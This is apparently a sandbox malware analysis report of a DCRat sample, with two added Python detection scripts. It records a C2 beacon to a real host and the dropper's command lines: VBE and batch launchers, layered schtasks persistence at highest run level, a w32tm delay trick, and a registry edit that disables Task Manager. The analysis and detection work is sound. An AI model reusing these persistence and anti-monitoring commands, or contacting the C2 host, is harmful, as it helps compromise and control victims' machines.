                                  Sep 27, 2024 08:43:53.823234081 CEST1236INData Raw: 33 30 38 2e 31 38 32 20 31 30 37 2e 34 34 36 20 33 30 39 2e 35 32 31 20 31 30 35 2e 37 32 38 43 33 30 39 2e 39 30 34 20 31 30 35 2e 31 35 35 20 33 30 39 2e 33 33 20 31 30 34 2e 32 20 33 30 38 2e 37 35 36 20 31 30 34 2e 32 43 33 30 35 2e 33 31 33
                                  Data Ascii: 308.182 107.446 309.521 105.728C309.904 105.155 309.33 104.2 308.756 104.2C305.313 104.2 301.87 104.964 298.619 106.3C298.619 106.3 296.898 106.873 296.324 107.255C295.941 106.873 294.794 106.11 294.411 106.11C295.176 104.391 296.324 102.291 2
                                  Sep 27, 2024 08:43:53.828172922 CEST1236INData Raw: 20 31 33 32 2e 39 38 33 20 34 31 2e 39 35 30 32 43 31 33 30 2e 36 38 38 20 34 33 2e 32 38 36 39 20 31 32 38 2e 32 30 32 20 34 34 2e 36 32 33 35 20 31 32 35 2e 37 31 35 20 34 35 2e 39 36 30 32 43 31 32 33 2e 34 32 20 34 37 2e 32 39 36 39 20 31 32
                                  Data Ascii: 132.983 41.9502C130.688 43.2869 128.202 44.6235 125.715 45.9602C123.42 47.2969 121.316 48.6335 118.83 49.2064C118.83 49.2064 117.108 48.4426 116.917 48.4426C101.233 45.7692 86.8885 48.4426 71.3961 51.3068C66.997 52.0706 62.4066 53.0254 58.007
                                  Sep 27, 2024 08:43:54.156132936 CEST572OUTGET /d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme HTTP/1.1
                                  Accept: */*
                                  Content-Type: application/json
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                  Host: a1025223.xsph.ru
                                  Sep 27, 2024 08:43:54.365571022 CEST1236INHTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:43:54 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                  Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
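
The exchange above is the sample's check-in: a GET to an eight-hex-character .php endpoint on a1025223.xsph.ru whose query string carries three mixed-case parameter names, two 32-hex names, and then repeats the first three name=value pairs verbatim, sent with a Content-Type header although a GET carries no body. The server answered 403 with a hosting error page (the raw bytes d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 in the title decode to the Russian word "Ошибка", "Error", which the ASCII rendering dropped), so no tasking was returned in this capture. The following is an added example, not part of the Joe Sandbox report: it parses the request text copied from the capture, extracts those features, and classifies the reply. The feature names, the score weights and the "5 or more is interesting" threshold are this example's own assumptions, not a published DCRat signature.

```python
"""Feature extraction for the beacon captured above (GET /d2e9d328.php on
a1025223.xsph.ru and its 403 reply).  Added example, not part of the Joe
Sandbox report.  REQUEST is copied from the capture; the response is reduced
to its status line and headers; the heuristics and weights are assumptions."""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Copied from the capture above (constructed as a single string).
REQUEST = (
    "GET /d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW"
    "&bosx0LppM3C276sojEJ5=FCtpJNQfNme&2132410dd3c9d0ed40475469f1dad04b="
    "a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1="
    "AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO"
    "&jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW"
    "&bosx0LppM3C276sojEJ5=FCtpJNQfNme HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/json\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29\r\n"
    "Host: a1025223.xsph.ru\r\n\r\n"
)
# Status line and headers of the reply above; the HTML body is omitted.
RESPONSE_HEAD = (
    "HTTP/1.1 403 Forbidden\r\nServer: openresty\r\n"
    "Date: Fri, 27 Sep 2024 06:43:54 GMT\r\nContent-Type: text/html\r\n"
    "Transfer-Encoding: chunked\r\nConnection: keep-alive\r\n"
    "Vary: Accept-Encoding\r\n\r\n"
)

HEX_PHP = re.compile(r"^[0-9a-f]{8}\.php$")          # d2e9d328.php
HEX32 = re.compile(r"^[0-9a-f]{32}$")                 # MD5-shaped parameter names
MIXED_ALNUM = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])[A-Za-z0-9]{10,}$")


def parse_head(raw):
    """Split an HTTP head into (start line, lower-cased header dict)."""
    lines = raw.partition("\r\n\r\n")[0].split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def beacon_features(raw_request):
    """Structural features of the request; no payload decoding is attempted."""
    start, headers = parse_head(raw_request)
    method, target, _version = start.split(" ", 2)
    url = urlsplit(target)
    params = parse_qsl(url.query, keep_blank_values=True)
    counts = Counter(name for name, _ in params)
    return {
        "host": headers.get("host", ""),
        "hex_php_endpoint": bool(HEX_PHP.match(url.path.rsplit("/", 1)[-1])),
        "param_count": len(params),
        # In this capture the first three name=value pairs are sent twice.
        "repeated_params": sorted(n for n, c in counts.items() if c > 1),
        "md5_like_params": sorted(n for n in counts if HEX32.match(n)),
        "mixed_case_params": sorted(n for n in counts if MIXED_ALNUM.match(n)),
        # A GET declaring a body type is unusual for a browser.
        "content_type_on_get": method == "GET" and "content-type" in headers,
    }


def beacon_score(features):
    """Assumed weights; a total of 5 or more is worth a closer look."""
    return (2 * features["hex_php_endpoint"]
            + 2 * bool(features["repeated_params"])
            + bool(features["md5_like_params"])
            + 2 * (len(features["mixed_case_params"]) >= 2)
            + features["content_type_on_get"])


def classify_response(raw_head):
    """'error_page' when the server refused with an HTML page: the client got
    no tasking, whatever the reason for the refusal."""
    start, headers = parse_head(raw_head)
    status = int(start.split(" ")[1])
    if status >= 400 and headers.get("content-type", "").startswith("text/html"):
        return "error_page"
    return "ok" if status == 200 else f"status_{status}"


if __name__ == "__main__":
    feats = beacon_features(REQUEST)
    print(feats, "score:", beacon_score(feats), "reply:", classify_response(RESPONSE_HEAD))
```

Two pivots fall out of the parsed request even without the payload: the duplicated name=value pairs, which a browser-generated query would not produce, and a hard-coded Chrome/96 and Edg/96 User-Agent on a sample analysed in September 2024, roughly three years after that browser version shipped.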



                                  Target ID:0
                                  Start time:02:42:02
                                  Start date:27/09/2024
                                  Path:C:\Users\user\Desktop\adKGhCOOzg.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\adKGhCOOzg.exe"
                                  Imagebase:0x340000
                                  File size:3'099'403 bytes
                                  MD5 hash:3B5AE0315B4623A6BD2C711BC8B8E28F
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:2
                                  Start time:02:42:02
                                  Start date:27/09/2024
                                  Path:C:\Windows\SysWOW64\wscript.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\portcontainerRef\myQbMgAKm.vbe"
                                  Imagebase:0x9c0000
                                  File size:147'456 bytes
                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:02:42:11
                                  Start date:27/09/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\portcontainerRef\J34SCTDenq2CEriZjkOuf.bat" "
                                  Imagebase:0xc50000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:02:42:11
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff70f010000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:5
                                  Start time:02:42:11
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\SurrogateContainerAgent.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\portcontainerRef\SurrogateContainerAgent.exe"
                                  Imagebase:0xec0000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1476955180.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1476955180.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1480370070.000000001344D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 88%, ReversingLabs
                                  Reputation:low
                                  Has exited:true

                                  Target ID:10
                                  Start time:02:42:13
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\schtasks.exe
                                  Wow64 process (32bit):false
                                  Commandline:schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 14 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /f
                                  Imagebase:0x7ff610800000
                                  File size:235'008 bytes
                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:11
                                  Start time:02:42:14
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\schtasks.exe
                                  Wow64 process (32bit):false
                                  Commandline:schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmE" /sc ONLOGON /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f
                                  Imagebase:0x7ff610800000
                                  File size:235'008 bytes
                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:12
                                  Start time:02:42:14
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\schtasks.exe
                                  Wow64 process (32bit):false
                                  Commandline:schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 11 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f
                                  Imagebase:0x7ff610800000
                                  File size:235'008 bytes
                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:13
                                  Start time:02:42:14
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\schtasks.exe
                                  Wow64 process (32bit):false
                                  Commandline:schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 7 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /f
                                  Imagebase:0x7ff610800000
                                  File size:235'008 bytes
                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:14
                                  Start time:02:42:14
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\schtasks.exe
                                  Wow64 process (32bit):false
                                  Commandline:schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmE" /sc ONLOGON /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f
                                  Imagebase:0x7ff610800000
                                  File size:235'008 bytes
                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:15
                                  Start time:02:42:14
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\schtasks.exe
                                  Wow64 process (32bit):false
                                  Commandline:schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 5 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f
                                  Imagebase:0x7ff610800000
                                  File size:235'008 bytes
                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:16
                                  Start time:02:42:15
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\suxlltqCa3.bat"
                                  Imagebase:0x7ff651810000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:17
                                  Start time:02:42:15
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff70f010000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:18
                                  Start time:02:42:15
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\w32tm.exe
                                  Wow64 process (32bit):false
                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Imagebase:0x7ff6141e0000
                                  File size:108'032 bytes
                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:19
                                  Start time:02:42:15
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Imagebase:0x2c0000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000002.1571279590.0000000002761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000002.1571279590.000000000279D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 88%, ReversingLabs
                                  Has exited:true

                                  Target ID:20
                                  Start time:02:42:15
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Imagebase:0x4d0000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.1556039207.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  Target ID:23
                                  Start time:02:42:20
                                  Start date:27/09/2024
                                  Path:C:\Windows\SysWOW64\reg.exe
                                  Wow64 process (32bit):true
                                  Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                  Imagebase:0xd10000
                                  File size:59'392 bytes
                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:25
                                  Start time:02:42:20
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true
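
The entries above record the dropper's whole installation chain as plain command lines: wscript running a .vbe from C:\portcontainerRef (Target 2), cmd running a .bat from the same directory and later from Temp (Targets 3 and 16), six schtasks /create calls that register the payload both ONLOGON with /rl HIGHEST and every 5 to 14 minutes under two task names (Targets 10 to 15), w32tm /stripchart against localhost used purely to burn five seconds before the payload restarts (Target 18), reg add of DisableTaskMgr (Target 23) and wscript running GUID-named .vbs files from Temp (Target 25). The following is an added example, not part of the Joe Sandbox report: a small triage pass that reads those command lines (copied from the entries above, plus one constructed benign line as a control) and flags each pattern, then correlates the scheduled tasks per target binary. The rule names, the 15-minute interval threshold and the "two or more tasks for one binary" threshold are this example's own assumptions, not Joe Sandbox or Sigma rules.

```python
"""Triage pass over the process list above.  Added example, not part of the
Joe Sandbox report: command lines are copied from Targets 2, 3, 10-12, 16,
18, 23 and 25; rule names and thresholds are this example's own assumptions."""
import re
from collections import defaultdict

# Constructed sample input: command lines copied from the report above.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\WScript.exe" "C:\portcontainerRef\myQbMgAKm.vbe"',
    r'C:\Windows\system32\cmd.exe /c ""C:\portcontainerRef\J34SCTDenq2CEriZjkOuf.bat" "',
    r"""schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 14 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /f""",
    r"""schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmE" /sc ONLOGON /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 11 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f""",
    r'"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\suxlltqCa3.bat"',
    r"w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2",
    r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f",
    r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs"',
    # Constructed benign control: a vendor script under Program Files.
    r'"C:\Windows\System32\WScript.exe" "C:\Program Files\Vendor\setup.vbs"',
]

_TOKEN = re.compile(r'"[^"]*"|\S+')
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files")
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".bat", ".cmd")


def tokenize(cmdline):
    """Split on whitespace keeping "quoted" runs together; drop the double
    quotes and the single quotes schtasks wraps the /tr target in here."""
    return [t.strip('"').strip("'") for t in _TOKEN.findall(cmdline)]


def switches(tokens):
    """Map /switch -> following value (True when the switch takes none)."""
    out = {}
    for i, t in enumerate(tokens):
        if t.startswith("/"):
            nxt = tokens[i + 1] if i + 1 < len(tokens) else "/"
            out[t.lower()] = True if nxt.startswith("/") else nxt
    return out


def outside_system_dirs(path):
    """Absolute path that is under neither Windows nor Program Files."""
    p = path.lower()
    return p[1:3] == ":\\" and not p.startswith(SYSTEM_DIRS)


def untrusted_script(path):
    p = path.lower()
    return p.endswith(SCRIPT_EXT) and ("\\temp\\" in p or outside_system_dirs(p))


def analyse(cmdline):
    """Return (rule, detail) findings for one command line."""
    toks = tokenize(cmdline)
    if not toks:
        return []
    exe = toks[0].lower().rsplit("\\", 1)[-1].removesuffix(".exe")
    low = [t.lower() for t in toks]
    found = []
    if exe == "schtasks" and "/create" in low:
        o = switches(toks)
        name, target, mo = o.get("/tn", ""), str(o.get("/tr", "")), str(o.get("/mo", ""))
        if str(o.get("/sc", "")).upper() == "MINUTE" and mo.isdigit() and int(mo) <= 15:
            found.append(("schtasks_high_frequency", f"{name} every {mo} min -> {target}"))
        if str(o.get("/rl", "")).upper() == "HIGHEST":
            found.append(("schtasks_run_level_highest", f"{name} -> {target}"))
        if outside_system_dirs(target):
            found.append(("schtasks_nonstandard_target", target))
    elif exe == "reg" and "policies\\system" in " ".join(low) and "disabletaskmgr" in low:
        if str(switches(toks).get("/d")) == "1":
            found.append(("taskmgr_disabled", toks[2]))
    elif exe in ("wscript", "cscript", "cmd"):
        found += [(f"{exe}_untrusted_script", t) for t in toks[1:] if untrusted_script(t)]
    elif exe == "w32tm" and "/stripchart" in low and "/computer:localhost" in low:
        # Sampling the local clock N times only serves to consume time.
        found.append(("w32tm_sleep_surrogate", cmdline))
    return found


def correlate_tasks(cmdlines):
    """Distinct scheduled tasks per target binary; two or more for one
    binary is the layered persistence visible in Targets 10-15 above."""
    per_target = defaultdict(set)
    for c in cmdlines:
        toks = tokenize(c)
        if toks and toks[0].lower().endswith(("schtasks", "schtasks.exe")):
            o = switches(toks)
            if "/tr" in o and "/tn" in o:
                per_target[str(o["/tr"]).lower()].add(
                    (o["/tn"], str(o.get("/sc")), str(o.get("/mo", ""))))
    return {t: sorted(v) for t, v in per_target.items() if len(v) >= 2}


def triage(cmdlines):
    """Findings per command line plus task correlation for a process list."""
    hits = {c: analyse(c) for c in cmdlines}
    return {"hits": {c: f for c, f in hits.items() if f},
            "layered_tasks": correlate_tasks(cmdlines)}


if __name__ == "__main__":
    for line, findings in triage(SAMPLE_CMDLINES)["hits"].items():
        print(line[:72], *[f"  - {r}: {d}" for r, d in findings], sep="\n")
```

The per-line rules each fire on a single entry; correlate_tasks is what turns them into the DCRat-style picture above, where the same binary is registered both at logon with the highest run level and on several short minute intervals under two task names. On a live host the same functions can be fed Sysmon event ID 1 or Security 4688 command lines instead of the constructed list.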

                                  Target ID:26
                                  Start time:02:42:20
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"
                                  Imagebase:0x760000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.1611979914.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  Target ID:27
                                  Start time:02:42:21
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\f765102e-847e-4ba7-8e69-2cfb40b35d1c.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:28
                                  Start time:02:42:42
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Imagebase:0x580000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001C.00000002.1772787740.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  Target ID:29
                                  Start time:02:42:43
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\a838f51f-2608-4fa8-98f2-8c025efe4e1a.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:30
                                  Start time:02:42:43
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\edd106de-c4c6-4bbc-b780-ae6716fb30a7.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

